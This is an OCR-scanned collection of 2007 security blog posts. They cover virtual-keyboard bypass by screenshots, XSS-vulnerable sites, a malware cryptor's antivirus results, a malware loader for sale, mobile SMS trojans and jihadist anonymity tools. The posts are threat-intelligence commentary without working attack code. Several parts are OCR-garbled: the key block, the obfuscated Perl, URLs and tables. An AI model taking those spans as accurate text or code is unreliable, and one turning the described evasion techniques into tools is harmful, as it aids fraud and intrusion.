UPDATE : More developments on the [6]DDoS attacks in Estonia now combined with deface- 
ments, which I think was only a matter of time. 


Related posts: 
[7]The Underground Economy’s Supply of Goods 


[8]The War against botnets and DDoS attacks 
[9]Emerging DDoS Attack Trends 


[10]Korean Zombies Behind the Root Servers Attack 
[11]Hacktivism Tensions - Israel vs Palestine Cyberwars 


1. http://it.slashdot.org/article.pl?sid=07/05/01/2135212%from=rss 


2. http: //www.linuxsecurity.com/docs/malware-trends .pdf 
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3.5.6 Disintermediating the Major Defense Contractors (2007-05-10 00:35) 


In ELTe 


[1] ~ Innovative and cost-effective altogether? Think [2]Space- 
ShipOne, a commercial space ship that didn’t come from a major defense contractor, not 
even NASA but from a competition won by a privately run company. How to disintermediate 
yet innovate? Become a venture capitalist, or an angel investor and optimistically hope 
the academic-to-commercialization process would happen with one of your investments. 
The [3]DeVenCl project aims to [4]connect sellers with buyers and seems like a [5]sound 
short-term objectives oriented idea compared with [6]In-Q-Tel the CIA’s VC fund emphasizing 
on long-term R &D: 


" Some companies have already profited from the program. In 2003, when DeVenCl was 
in its experimental phase, the Defense Information Systems Agency was looking for ways 
to protect computer networks . After speaking to several companies through DeVenCl and 
evaluating their technology, the agency wound up working with ArcSight, a software company 
based in Cupertino, Calif., which won $3.6 million in related contracts over the next few 
years, DeVenCl officials said. Mr. Novak of Novak Biddle said he brought with him to the 
March DeVenCl meeting two executives from a small start-up developing biometric technology 
that could be used for things like advanced fingerprinting or eye scans. Mr. Novak said the 
chief executive and chief technology officer from the Virginia company, which he declined to 
name for competitive reasons, gave a presentation to the roughly 50 assembled procurement 
agents. " 


Here’s [7]In-Q-Tel’s investment portfolio so far - Google used to be among them. 


Related posts: 


[8]Insider Competition in the Defense Industry 
[9]Aha, a Backdoor! 
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[10]Overachieving Technology Companies 


1. http: //photos1. blogger. com/blogger2/4099/2257/200/in-q-tel-portfolio. jpg 


2. 

3 

4. ttp://nytimes.com/2007/05/07/technology/07venture.htm1?_r=2%adxnn1=1koref=sloginkref=businesskadxnn1lx=11 
5. 

6 


7. http: //ddanchev. blogspot .com/2006/10/cias-in-q-tel-investments-portfolio.htm 
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ttp://ddanchev. blogspot .com/2006/05/insider-competition-in-defense.htm 


9. http: //ddanchev. blogspot .com/2006/05/aha-backdoor. htm 
10. http: //ddanchev. blogspot . com/2007/02/overachieving-technology-companies.htm 


3.5.7 International Cryptography Regulations Map (2007-05-10 01:42) 


#--Begin GIMF ASRAR EI Moujahedeen 1.0 Public Key 2048 bit-— 
pyHAvSRbPuhWimwfeX+KjrJkSINBinCl1 sKNSCqTbYZR3KGngjkOhc1 GXWhnJ 
U7QpiWLsaR6J+rsqSe8J5zJSh50PCrzv2+K540q0MMwi8udJ5LpiWm20loTy 
tiOVrNxSXi0Mpohzc+pWOwMNDdaSKW1lOyXc+kd3ybF RJMXNXNUKPwDCn 
UXPLSFNrWY vJVuBWn4VA7TNTrOdzw2uT MJcNo3IGOQA/h YDAOWY6bm+GZ 
QL+6 1 gXzLv52gg9X8F xleIvieG+sSt8sjThHGWO2WOWNGPSinwMGOZtGaM 
eVvmEKdTKQxCW3WVmib0I4qLiY xXCEq/JqQosrMPuXd4J4VTQLOB3I7YkKSNy 
910BgAm+mbNJjkISlko+miAjDOMmjO+3niP/t1 S/Ezqb/+8EZvbriqmpBy2Jd 
mm6CNTGX1PDLaGhPibT DnzL2WaghB7134YX1 ESXp/QXV7 eKabdp6BkCahw 
8ZdDPcoLQzUbMswARt8xcuSVitujCZ9Ds8OMhQaVizzXzCU 1r1 ApzWsiEu74cU 
RAKCma@SbM2h1iGuSbastL/dUn/goxPGaT KifvMg== 

#---End GIMF ASRAR El Moujahedeen 1.0 Public Key 2048 bit—-- 


Regulations on importing, exporting and using encryption greatly vary across the world. 
Bert-Jaap Koops came up with some [1linformative maps highlighting the big picture : 


" This is a graphic summary of the pertaining cryptography laws and regulations world- 
wide as outlined in the most recent version of my Crypto Law Survey. It shows the import 
controls, export controls, and domestic controls, according to the information available to me. 
Consult the corresponding entry in the Crypto Law Survey for the contents of the pertaining 
regulation in a particular country. " 


And here’s a related post on [2]a bureaucratic utopia, another one on [3]bureaucracy vs 
reality when it comes to security, as well as famous cases related to [4]criminals using 
encryption. 


1. http: //rechten.uvt .nl/koops/cryptolaw/cls-sum.htm 


2. http: //ddanchev. blogspot .com/2006/06/all-your-confidentiality-are-belong-to.htm 


3. http: //ddanchev. blogspot .com/2006/03/are-cyber-criminals-or-bureaucrats.htm 
4. http://www.cs.georgetown.edu/%7Edenning/crypto/cases.htm 
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3.5.8 Defeating Virtual Keyboards (2007-05-10 16:18) 
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To deal with the threat of keyloggers - or to win time during te process of implementing two 
factor authentication and one-time-passwords-in-everything - E-banking providers started 
introducing virtual keyboards as a pragmatic solution to the threat. Malicious attackers are 
anything but old-fashioned and this is a great example that insecurities are only a matter of 
perspective. To the E-banking providers who were aware that a static virtual keyboard would 
be much more easier to defeat, a randomized characters appearance came into play and so 
attackers adapted by first [1]taking video sessions of the login process, and now turning each 
mouse click into a screenshot to come up with the accounting data in a [2]PoC on Defeating 
Citibank Virtual Keyboard: 


" Citibank Virtual Keyboard is a security enhancement for protecting from the key loggers. 
Using this virtual keyboard user can enter Card no and IPIN using mouse. This keyboard will 
display a keys in random position in a virtual keyboard on the screen where it makes little 
difficult for password capture. This only gives confidence for end user from key loggers not 
from other methods. Local attacker can use Win32 API's to capture using screen shot method 
and obtain sensitive information including Credit Card/Debit Card (Suvidha Account), IPIN and 
misuse it. " 


From a malicious economies of scale perspective, these rather amateur techniques mean lack 
of efficiency compared to advanced tools suh as [3]the Nuclear Grabber which | intend to 
cover in-depth in a future post from the [4]Malicious Wild West series. 


1. http: //ddanchev. blogspot . com/2006/09/banking-trojan-defeating-virtual .htm 


2. http: //www.tracingbug.com/index.php/articles/view/23.htm 
3. http: //ddanchev. blogspot .com/2006/11/nuclear-grabber-toolkit.htm 


4. http://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_25.htm 
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3.5.9 Big Brother Awards 2007 (2007-05-11 17:39) 


[1] | always liked the idea of emphasizing on the big picture when 
it comes to the worst privacy invadors on a worldwide basis compared to that of a particular 
country only. They are all interconnected to a certain extend, united under the umbrella of 
the common good which as a matter of fact won a golden boot in this year’s [2]Big Brother 
International Awards : 


" Pl’s ’Big Brother Awards’ have been running for nearly ten years, with events run in 
eighteen countries around the world. Government institutions and companies have been 
named and shamed as privacy invaders in a variety of countries and contexts. This year was 
the first time that Privacy International ran an international event to identify the greatest 
invaders around the world. The event was hosted by ’the pope’, as presented by Simon Davies 
in full regalia. Previous hosts include ’Dr. Evil’ and The Queen of England’. " 


Here are the winners in their categories : 


Most invasive company - Choicepoint 

Data aggregators and centralizing too much personal data in a single place makes it vulnerable 
even to [3]pringles hacking attacks. Next year I’m sure Google’s purchase of Doubleclick 
would get more attention 


Worst Public Official - Stewart Baker 
The way Microsoft and open source look awkward in a sentence in this very same way 
democracy looks awkward next to Russia 


Most Heinous Government - The United Kingdom 
Fully agree here. Twisting the common good is very marketable 


Most Appalling Project or Technology - The International Civil Aviation Organization 


| think the CCTV industry should have won here the rest are bureaucrats whose closed 
doors propositions later on face the public outbreak of how not to implement them. Anyway 
supply meets the demand for surveillance. 


Lifetime Menace Award - The ‘Common Good’ 

The main reason for the existence of [4]today’s intrusive surveillance technologies is the idea 
of the common good. [5]We spy on you to protect you, we take away your civil liberties to 
protect you, and [6]CCTV after CCTV you end up in a situation which can be best seen in the 
U.K 


Related posts: 
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[7]The Future of Privacy = don’t over-empower the watchers! 

[8]Security vs Privacy or what’s left from it 

[9]The Cell-phone Industry and Privacy Advocates VS Cell Phone Tracking 
[10]Afterlife Data Privacy 


. http://photos1. blogger .com/blogger2/4099/2257/200/brainwashing. jpg 


ttp://www.privacyinternational.org/article.shtm1?cmd/,5B347/,5D=x-347-553112 


ttp://www.itnews.com.au/newsstory.aspx?ClaNID=51672&src=site-marq 


. http://ddanchev.blogspot . com/2007/03/youve-got-something-in-your-eye.htm 


. http: //ddanchev. blogspot .com/2007/03/documentary-on-cctvs-in-uk. htm 


. http://ddanchev. blogspot . com/2006/03/future-of-privacy-dont-over-empower .htm 
ttp://ddanchev.blogspot.com/2006/03/security-vs-privacy-or-whats-left-from.htm 


a 
2 
3 
4 
5. http: //ddanchev. blogspot .com/2007/01/eyes-in-londons-sky-surveillance-poster.htm 
6 
7 
8 
9 


. http: //ddanchev. blogspot .com/2006/05/cel1-phone-industry-and-privacy .htm 


10. http://ddanchev. blogspot .com/2006/09/afterlife-data-privacy.htm 


3.5.10 XSS The Planet (2007-05-14 17:26) 


You have attempted to execute an action which our server has flagged as malicious, Your request will 
not be completed at this time. Please contact our service representatives and we will be glad to resolve 
this issue, 


Click on the 'GO BACK' button to return to the previous page. 


iGO BACK 


Yet another initiative proving that major sites indeed suffer from [1]XSS vulnerabilities in 
exactly the same fashion [2]E-banking sites do. Perhaps the most interesting point regarding 
the list is that it’s from 2005 and some of the sites still remain vulnerable but why is that? Lack 
of internal incentive programs to deal with the problem? Not getting the necessary attention 
given the rise of the lost laptop with unencrypted data issue? A lack of common sense is the 
best alternative for me. Consider the perspective - its like utilizing quantum encryption for 
the sake of protecting the confidentiality of your data but remaining vulnerable to wardriving 
attacks capable of obtaining the data in a pre-encryption stage, even on the fly. The encrypted 
data myopia is on the rise and it’s the result of a yet another "stolen laptop news article" 
emphasizing on current and ignoring the emerging trends, namely, that a mobile workforce’s 
improved productivity is proportional with the insecurities coming from storing sensitive data 
in a less controlled external environment. There’s no point in implementing state-of-the-art 
technology when you haven't taken care of the basics, such as the ones that are so easy to 
exploit even a script kiddie can become the next pentagon hacker bruteforcing passwords on 
an unclassified system. And yes - [3]trivial XSS ones too. 


Currently active URLs on the list are the following : 
Nortel.com 
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Federal Deposit Insurance Corporation 
JC Penney 

SonyStyle.com 

D-Link.com 

Poetry.com 


1. http: //pointblanksecurity.com/xss/xss2.php 


2. http: //ddanchev. blogspot .com/2007/02/xss-vulnerabilities-in-e-banking-sites.htm 


3. http://pointblanksecurity.com/xss/xss2.php 


3.5.11 Mind Mapping Web 2.0 Threats (2007-05-14 21:30) 


+ Backdooring Quicktime ~~ Backdooring MP3s (OTL) 
RSnake's XSS Cheat Sheet + SS Evasion Tactics ~ Backdooring POF Files > Universal POF XSS 
Backdoornng <— + Backdooring Flash 


frame Technique > 
> Backdooring images 

IMG Technique > 
+ JavaScript Port Seanning ~~ Backdooring MSWord 


> Web 2.0 Hacking \ > Cross Site Request Forgery 


External JavaScript Technique > 
XML Port Scanning + 
css > DNS Pinning 

Evil Marketting > 


JS Login Detection + > Stealing the Browser History 


¢ $s 6 
Authenticated Images * * Hacking RSS Feeds 


Authenticated Redwects + — 
Hacking Social Networks 
DOM-based XSS 
MTTP-AECHAELDAW..ORG 


An informative, and for sure to be expanded mind map presenting various Web 2.0 threats 
courtesy of [1]Mike Daw who by the way neatly integrated the anti virus detection results to 
his [2]web backdoors compilation, | commented on in a [3]previous post. Here are [4]two more 
mind maps of Firefox security related tools, and the threats faced by mobile devices. A related 
post on [5]the "wormability" of web application insecurities for everyone thinking flash worms. 


1, 

2 

3 

4 

5 
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3.5.12 Sampling Jihadists’ IPs (2007-05-16 01:01) 


Unique IP addresses All IP addresses 
Region Percentage Region Percentage 
Europe fea ite Europe ear Ache 

Gulf 21.14 Gulf 26.67 

Maghreb 12.81 Maghreb 13.63 
Levant 11.09 Levant Lt 7 
Egypt 10.33 Egypt eee) 

Americas 8.26 Americas 6.6 

Asia-Pacific 2.62 Asia-Pacific Ree) 


[1]Great idea as a matter of fact : 


" The following is based on an analysis of 4,593 IP addresses (1,452 unique IP addresses). The 
IPS were acquired from 19 of the more prominent of the Salafist/Jinadist forums , including 
both Arabic and non-Arabic forums , from 01 January through 30 April of this year. " 


Taking into consideration the per-country stats, do not exclude the logical possibility of 
[2]IP cloaking while browsing these and also, the tiny number of intelligence and lone gunman 
info warriors gathering [3]OSINT data. In another much more in-depth analysis on mapping 
the online jihad, the authors point out the [4Jemerging internationalization of jihad as well : 


" The near exclusive use of the Arabic language in these significant jihadi websites likely 
accounts for the concentration of activity in the Middle East and North Africa. But with a reach 
to more than 40 countries, the virtual community within these ten influential sites assumes 
a global significance. The international jihadi movement’s use of the internet to fuel the 
exchange of ideological expansion and its corresponding influx of support will increase the 
vulnerability of many countries to the appeal of extremism. " 


At least these organizations don’t rely on setting up [5]fake jihadist communities to come up 
with the sample data, but know exactly where to look for. 


1. ftps / Fw sof, ong/ear chives 7006039, phg 
2. neup://ddanchev.blogspot.con/2005/412/ip-cloaking-and- competitive heal 

3. http: //ddanchev. blogspot . com/2006/09/benefits-of-open-source-intelligence -html 
4. http://www. isn.ethz.ch/news/sw/details .cfm?1ID=17535 

5. http: //ddanchev. blogspot. con/2007/05/cyber- traps for-vantabe- jihadists. heal 
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3.5.13 The Jihadist Security Encyclopedia (2007-05-16 01:41) 
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A month ago, the Media Jihad Battalion started distributing a 118 pages long encyclopedia on 
anything starting from secure communications to keywords not to search for as they'll raise an 
early warning system alarm. The front cover is so [1]Blade’s style, but the PSYOPS motive is 
highly influential. Here’s a[2] translated table of contents and the original version attached. 


1. http://upload.wikimedia. org/wikipedia/en/thumb/1/19/Blade_movie. jpg/200px-Blade_movie. jpg 
http: //onlinejihad.wordpress.com/2007/04/05/the-ultimative-security-encyclopedia/ 
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3.5.14 


Visual Script Obfuscation (2007-05-16 02:10) 


nvas (w,51 
ter$m(1,sub{$N= 
*$ ;@D=(2,$a,515, 
}):pop@D}7..8}@S, 64; 
x++} split//:++$y:}< 
}@5;{for$p(@S) {map{ 
y=$v+$qe $g=g(-1) 73_ 
$q] =$gi$G] [Ost $e- 
*$x+$_]}@5}upda 
7SE#E Sg; 


4,he,514) 
eget$c (bq) ;@S5=0 
$a) ;map{createLin 
$F?do{open(_,$F);ma 
_>}imap{$x=$_-smap{§$ 
$q=$_:$t=O0;for$v(-1 
| | $v#or$G=$g; §t+=sg 
$G}}@S}for$x (@S) { 
te$m:redo}}j;Ma 
($F, $G) =8 


B*$y7$1I=$ 
I[ $M] and$c->del 
ete ($I) ;$I[$M]=cr 
eateOval$c (3+8*$x,3 
+8*$y,94+6*$x,9+8*$y 
,-f=>$2?"blue":$N,o 
ut line=>$N) }$Q}use# 
Tk; $m=new#MainWin 
dow{title=>$G); 
$c=$m->Ca 


->pack; af 
..63;map{$a=2+68 
efc (@D) ;-@D=($a, 8D 
pi$x=O;mapi{g(/@/};$ 
y=$_7g(1>rand#4)}@5 
»-Lj)imap($x=$p+$_:3$ 
3} (-1..1)}$N[64*$p+ 
map{$y=$_-g+$N[64 
inLoop';s#\s##g 
ARGV; eval 


We often talk and deobfuscate scripts aiming to hide their real and often [1]malicious intentions. 
But what if malicious attackers have become so efficient in their obfuscation, that they decide 
to show some [2]JAPH style in order to make them harder to analyze by visually obfuscating 
the scripts as you can see here? 


1. http: //ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample.htm 


2. http://www. cpan.org/misc/jap 


3.5.15 Corporate Espionage Through Botnets (2007-05-16 22:09) 


G) Support Intelligence 


Following my previous post on [1J]OSINT Through Botnets, here’s a company that’s [2]catego- 
rizing Fortune 500 companies whose networks are heavily polluted with [3]malware infected 
hosts : 


" Support Intelligence (SI), a network security company in San Francisco, has been running 
what it called "30 Days of Bots," featuring corporate networks infected with spam-churning 
bots. It began analyzing data in February, monitoring 10,000 domains that plow data into a 
trap much like a fishnet, except the intelligence in the data is designed to determine what 
information to keep by looking for spam. In total, SI analyzed traffic from more than 100 
sources, including the aforementioned spam traps. " 
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Considering the possibility for gathering open source intelligence through military and govern- 
ment infected PCs only, it is logical to conclude that a specific company can be targeted on the 
basis of the already infected hosts on its network as well. Think about it. For the time being, a 
botnet’s master doesn’t really care if it’s a military or Fortune 500 company that’s infected as 
long as spam, phishing and malware goes out of these hosts. But passive corporate espionage 
in the form of intercepting the traffic going out of a specific company’s network shouldn’t be 
excluded as an opportunity. 


http: //ddanchev. blogspot .com/2007/04/osint-through-botnets. html 


1. 
2. http://www.support-intelligence.com/blog/ 
3. 


http: //www.esecurityplanet.com//article.php/3675496 


3.5.16 Yet Another Malware Cryptor In the Wild (2007-05-17 13:36) 


Me INC pier Dy Z5E 1 


Just stumbled upon a newly released cryptor in the wild, and as | pointed out in a previous post 
related to [l]yet another cryptor, they’re signature-based malware scanning’s worst enemy. 
By the time AV vendors obtain a sample and analyze the routines they use, unless an IPS 
solution is in place, and end user friendly perimeter defense detecting the bot-ization of the 
host are in place - an infection occurs. 


What’s the big picture? It’s launching a denial of service attack on anti virus vendors’ 
labs in the form of 
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AhnLab-V3 2007.5.16.1 05.16.2007 jno virus found 
Antivir 7 4.0.23 05.16.2007 |no virus found 
Authentium 4.93.8 05.16.2007 jno virus found 
Avast 4,7,.997.0 05.16.2007 |no virus found 
AVG 7.5,0.467 05.16.2007 |no virus found 
BitDefender 7.2 05.16.2007 |no virus found 
CAT-QuickHeal 9.00 05.16.2007 |(Suspicious) - DNAScan 
ClamAV devel-20070416 05.16.2007 jno virus found 
OrWeb 4.33 05.16.2007 |no virus found 
eSafe 7.0.15.0 05.16.2007 |suspicious Trojan/Worm 
eTrust-Vet 30.7 .3634 05.15.2007 |: rus found 
Ewido 4,0 05.16.2007 |: rus found 
FileAdvisor 1 05.17.2007 jno virus found 
Fortinet 2.85.0.0 05.16.2007 |suspicious 
F-Prot 4.3.2.48 05.16.2007 |no virus found 
F-Secure 6.70.13030.0 05.16.2007 |no virus found 
Ikarus Wade Lal 05.16.2007 |no virus found 
Kaspersky 4.0.2.24 05.17.2007 |; rus found 
McAfee 5032 05.16.2007 jno virus found 
Microsoft 1.2503 05.17.2007 |: rus found 
NOD32¥2 2271 05.16.2007 |no virus found 
Norman 5.80.02 05.16.2007 |: rus found 
Panda 9.0.0.4 05.16.2007 [Suspicious file 
Prevxl V2 05.17.2007 |: rus found 
Sophos 4.17.0 05.16.2007 |no virus found 
Sunbelt 2.2.907.0 05.12.2007 |VIPRE.Suspicious 
Symantec 10 05.16.2007 {r rus found 
TheHacker 6.1.6.115 05.15.2007 |: rus found 
VBA32 3.12.0 05.16.2007 [no virus found 
VirusBuster 4$.3.7:9 05.16.2007 |no virus found 
Webwasher-Gatewa 6.0.1 05.16.2007 |\Win32.ModifiedUPX.gen (suspicious 


distributing couple of hundred malware samples - future [2]family members of a malware 
group. Polymorphism encrypting routines are nothing new, but with DIY cryptors in the wild 
the result can be [3]quite successful even for copy cats: 


" Another example is the Stration family of malware, responsible for worms and other 
forms of malware in late 2006. “ Stration was changing so quickly—the encryption packaging, 
the compiler, everything. We saw up to 300 variants in a single day ,” says Ron O’Brien, senior 
security analyst at anti-malware vendor Sophos. " 


File size : 4608 bytes 


MD5 : 406e3a1443ec617f2c968a957a460f10 


SHA1 : 187abe8cec588b53126afbe8e600379a3bac2321 


1. http: //ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample_10.htm 


2. http: //ddanchev. blogspot .com/2006/08/malware-bot-families-technology-and.htm 
3. http: //www.csoonline.com/read/040107/brf_threat_watch.htm 
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3.5.17 Commercializing Mobile Malware (2007-05-18 18:14) 


Visionary enough, [1]l predicted this over an year ago, and despite that for the time being 
there are only two publicly known pieces of mobile malware sending sms messages from the 
infected devices to premium numbers, it’s [2]Jan emerging trend for customers and mobile 
operators to [3]keep an eye on: 


" After installation, the Viver trojans immediately start sending SMS messages to premium-rate 
numbers. The messages are sent with proper international area codes, so they are able to 
reach the correct destination even when activated outside Russia. We've already seen for- 
profit malware in mobile devices: Wesber.A and Redbrowser are Java Midlet trojans that try to 
send messages to Russian premium-rate numbers. But these trojans require user acceptance 
per each message and are able to send messages correctly only inside Russia. " 


Some comments | made back then: 


"The number and penetration of mobile devices greatly outpaces that of the PCs. Mal- 
ware authors are actively experimenting and of course, progressing with their research on 
mobile malware. The growing monetization of mobile devices, that is generating revenues 
out of users and their veto power on certain occasions, would result in more development in 
this area by malicious authors. SPIM would also emerge with authors adapting their malware 
for gathering numbers. Mobile malware is also starting to carry malicious payload. Building 
awareness on the the issue, given the research already done by several vendors, would be a 
wise idea." 


Something else to think about is related to Europe’s most recent mega-music event [4]Eu- 
rovision and the sms voting power that, given enough infected mobile devices are in place 
the results could change pretty fast if you’re following my thoughts. Thankfully, compared to 
zombie networks making it possible to do [5]intelligence and [6]espionage tweaks given the 
large infected population, we still cannot talk about mobile botnets. The most juicy target for 
the time being however, remains the rise mobile banking. 


[7]Another comment | made a while ago: 


" Malware authors indeed have [8]financial incentives to futher continue recompling publicly 
available PoC mobile malware source code, and it’s the purchasing/identification features 
phones, opening a car with an SMS, opening a door with an SMS, purchasing over an SMS or 
direct barcode scanning, mobile impersonation scams, harvesting phone numbers of infected 
victims, as well as unknowingly interacting with premium numbers are the things about to get 
directly abused - efficiently and automatically. " 
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Related posts: 


[9]Proof of Concept Symbian Malware Courtesy of the Academic World 
[10]Mobile Devices Hacking Through a Suitcase 


i eee eee teary ea eons ea 
2. hep: ows. viruslist.con/en/veblog?veblogid=208167S76 

3, peep://we f-secure, con/eabiog/#0000%104 

4. http: //en.wikipedia. org/wiki/Eurovision_Song_ Contest 

5, tep://adanchey. blopupot coa/2007/04/oint~turoughbotaata Had 

6. http: / /adanchev. blogspot. con/2007/06 /coxporate~espionage-through-bobaets. Wal 
7 

8 

9 


. http: //ddanchev. blogspot .com/2006/08/bed-time-reading-symbian-os-platform_12.htm 


. http: //www.symantec.com/avcenter/venc/data/trojan.redbrowser.a.html 
. http: //ddanchev. blogspot .com/2006/11/proof-of-concept-symbian-malware.htm 


10. http: //ddanchev. blogspot .com/2006/08/mobile-devices-hacking-through. htm 


3.5.18 Tricking a Laptop’s Fingerprint Authentication (2007-05-19 22:49) 
[1]The joys of fingerprint biometrics with a [2]duplicate fingerprint of the original. 


[EMBED] 


1. http: //ddanchev. blogspot .com/2006/06/wheres-my-fingerprint-dude.htm 
2. http: //ddanchev. blogspot .com/2006/11/how-to-fake-fingerprints .htm 


3.5.19 MySpace’s Sex Offenders Problem (2007-05-21 20:18) 


VLADIMIR NAROKROY 


MySpace, being one of the most popular social networking sites is always under fire on its 
efforts to combat known child offenders registering and using its database to find what they’re 
looking for. The problem isn’t MySpace as a faciliator for such type of communications but the 
vast amounts of personal information - future contact points - kids publish about themselves 
online, not knowing that on the Internet anyone can be a dog and most importantly, parents 
loosing the emotional connection with their kids and making it easier for someone to break 
the ice and establish trust. 
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Several months ago, funded by nothing more but his common sense Kevin Poulsen gath- 
ered name data from the [1]U.S public child offenders registry and found positive results with 
people - thankfully - stupid enough to use their real names. And while they wouldn’t do it 
again the next time instead of making it easier to aggregate the data, a CAPTCHA to limit such 
automatic activities was implemented. 


Please enter the code you see below and press Continue. 


Se aN 


audio version 


Continue | 


[‘f you are unable to use the code provided, please click here to generate a new code | 


Don’t blame MySpace blame bureaucracy. Meanwhile, here’s an article on U.S authorities 
demanding that [2]MySpace provide data on identified and removed known child offenders - 
they agreed : 


MySpace agreed Monday to provide the information to all states after some members of the 
group filed subpoenas or took other legal actions to demand it. The company said last week 
such efforts were required under the federal Electronic Communications Privacy Act before it 
could legally release the data. "Different states are going about it different ways," said Noelle 
Talley, spokeswoman for Cooper, who filed a "civil investigative demand" for the information. 
Connecticut Attorney General Richard Blumenthal used a subpoena that "compels this infor- 
mation right away - within hours, not weeks, without delay - because it is vital to protecting 
children," he said. 


If protecting children is vital, remove the CAPTCHA so everyone knowing how to aggre- 
gate and tweak the data will come up with far more sophisticated stats than the ones currently 
available. Actual results too. Next time it would become harder to track them, so don’t count 
on measures like these instead, ensure naughty conversations aren’t taking place at all. Makes 
me wonder one thing - should you be filtering known child offenders on the Internet perhaps a 
futile attempt given the pseudo-personalities they could establish, or at the ISP level and put 
them under surveillance right from the very beginning? Of course [3]child offenders should 
not have unmonitored access to the Internet so rethink the basics. 


Related posts: 
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[4]Registered Sex Offenders on MySpace 
[5]IMSafer Now MySpace Compatible 


. http: //www.nsopr.gov/ 


. http: //ddanchev. blogspot .com/2006/10/registered-sex-offenders-on-myspace. htm 
. http: //ddanchev. blogspot .com/2007/03/imsafer-now-myspace-compatible. htm 


3.5.20 A Malware Loader For Sale (2007-05-22 11:46) 


i 1.0 private 
3akpbrb paepeonbi 
[ Kaspersky Anti-Hacker Firewall 
[~ Kerio Personal Firewall 
I¥ Outpost Firewall 

T~ Tiry Firewall 

IV Jetico Personal Firewall 


KoHeurypauva— 
JV Asrosarpyska 
IV Ynanarb crapbili palin 


MHTeppan cK aYyHBaHHaAlMuH] = [5 


[~ Nocne yay saxpbieaemca 
I¥ Coxatb FSG [ Cxatb UPX 
[- Cnpararb npouece 


Cofpatb | <\0Lo ‘>| Nomowb | 


Continuing the [1]Shots from the Malicious Wild West series and the [2]yet another malware 
tool in the wild posts, here’s a recently advertised malware loader. Polymorphism, built in 
packing functions and the ability to set an interval for loading yet another executable at a URL 
or a URL redirector, DIY firewalls unloading techniques, pretty much anything ugly is in place - 
as uSual. The loader’s source code is currently available for $150, undetected bots go for $15 
per piece. Malware on demand in principle, or [3]malicious economies of scale? 


1. http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_25.htm 


2. http: //ddanchev. blogspot .com/2007/05/yet-another-malware-cryptor-in-wild.htm 


3. http: //ddanchev. blogspot .com/2007/03/underground-economys-supply-of-goods. htm 
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3.5.21 A Client Application for "Secure" E-banking? (2007-05-22 12:17) 


(@ 


Nip 
ARMORED 


ONLINE 


This is perhaps the second [1]product concept myopia right after the [2]lie detection software 
for text comminations | come across to recently. Remember a previous post [3]heading in the 
opposite direction, where a bank was trying to rebuild confidence in the most abused phishing 
medium - the email - to keep in touch with its customers? Here’s another company that’s 
betting on a third-party client application to solve the problem of [4]secure E-banking totally 
falling victim in the [5]Jsecure channel communication myopia one that | think has nothing to 
do with reality when it comes to the [6]success of phishing : 


" Here’s how Armored Online works: A company, such as a financial institution or online retailer, 
offers a downloadable client to customers through its website. 


That client then gives the customer’s computer a secure channel with which to communicate 
and transact with the company . 


Its Java-based browser is locked down, meaning it won’t accept any plug-ins, like cookies used 
by criminals. What’s more, the client can only “talk” to the server at the bank or online store. 
“It’s like iTunes for banks,” Mr. Sowerby said. " 


[7]The attack of the disabled cookies? [8]Not really, so [9]be realistic. Coming up with 
a third-party application as the cornerstone of E-banking security directly conflicts with E- 
banking’s biggest benefit - flexibility due to the compatibility with the most popular browsers. 
So you'd rather focus on the current situation - [10]Brandjacking instead of [11]re-inventing 
the SSL wheel - as a matter of fact the [12]Gozi trojan and the [13]Nuclear Grabber are quite 
comfortable with SSL as they bypass it entirely. Even worse, a [14]trojanized copy of the 
program will emerge given it receives any acceptance at all. And if banks start embracing 
it - don’t - we can easily start talking about DRM enabled E-banking where, both, banks and 
customers will turn into virtual hostages to a third-party application trying to reboot the market 
for anti-phishing services, totally forgetting the problem is not in the lack of unencrypted 
transactions as no one is sniffing the credentials, but pushing fake sites instead of letting 
customers pull the sites for themselves. 


Don’t disrupt in irrelevance. 


1. http: //www.armoredonline.com/ 
2. http: //ddanchev. blogspot .com/2007/04/lie-detecting-software-for-text .htm 


3. http: //ddanchev. blogspot. com/2006/04/heading-in-opposite-direction.htm 


4. http://ddanchev. blogspot .com/2006/01/security-threats-to-consider-when.htm 


. http://ddanchev. blogspot. com/2006/09/banking-trojan-defeating-virtual . html 


9. http: //ddanchev. blogspot .com/2007/05/defeating-virtual-keyboards.htm 
10. http://ddanchev. blogspot .com/2007/05/brandjacking- index.htm 
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11. http://news.netcraft.com/archives/2007/05/15/internet_passes_600000_ssl_sites.htm 
12. http://www.secureworks.com/research/threats/gozi/ 
13. http: //ddanchev.blogspot .com/2006/11/nuclear-grabber-toolkit .htm 


. http://www.symantec.com/security_response/writeup. jsp?docid=2007-042705-0108-99&tabid= 


3.5.22 Counter Espionage Tips from the Cold War (2007-05-23 20:03) 


There’s nothing old-fashioned in short films like these representing possible techniques used 
by intelligence services while recruiting - " Cold War counter-spy instructional film created 
to convince government officials traveling with top secret info to watch their backs. Watch 
hapless G-men get seduced and setup for blackmail by treacherous Soviet she-spies " 


[EMBED] 


And despite that today’s perception of sexy she-spies has evolved proportionally with 
the technological advances in espionage, some of the tips are still emphasizing on the basics. 


3.5.23 Jihadists’ Anonymous Internet Surfing Preferences (2007-05-23 21:13) 


& Exclusive ... Two best to conceal Alaibi and browse utmost secrecy; (complete and the latest edition) 


Bye ... 


My brothers loved many programs are known to conceal Alaibi and browse utmost secrecy, but I think they 
are two best programs for hour between Internet surfers ... 


} Origin Google ded to God. 
Sys Asus wl clas! 99 Gygesioll aol! Od iS eV igo! 
1 Gow logingid Whe acl] Las! logil Solaich pawl» JS oe Fol 
ed WIM Seu 


|@ Suggest a better translation 


Steganos Internet Anonym Pro 2006 8.0.1 


Steganos’ _ 


Internet Anonym 


Your anonymous SSL tunnel to the Internet. 


Jihadists are logically not just interested in [1]encryption and [2]steganography but also, in 
ways to anonymize their web surfing activities as much as possible. A wannabe jihadist whose 
tips and recommendations have gained him a lot of reputation around the forums | follow, 
recently came up with an in-depth article on recommended and reviewed IP cloaking services 
with direct download links in between. It makes [3]stats like these questionable to a certain 
extend as I’ve already pointed out. Among the [4]IP cloaking tools reviewed are : 

- [5]Steganos Internet Anonym Pro 
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- [6]Hide IP Platinum 3.1 
- [7]Proxy Switcher Pro 
- [8]Invisible Browsing v5.0.52 


TOR is, of course, mentioned as well but at the bottom of the article citing performance 
issues Compared to commercial solutions. [9]IP decloaking is not even considered as a 
concept. 


. http://ddanchev. blogspot .com/2007/04/mujahideen-secrets-encryption-tool.htm 
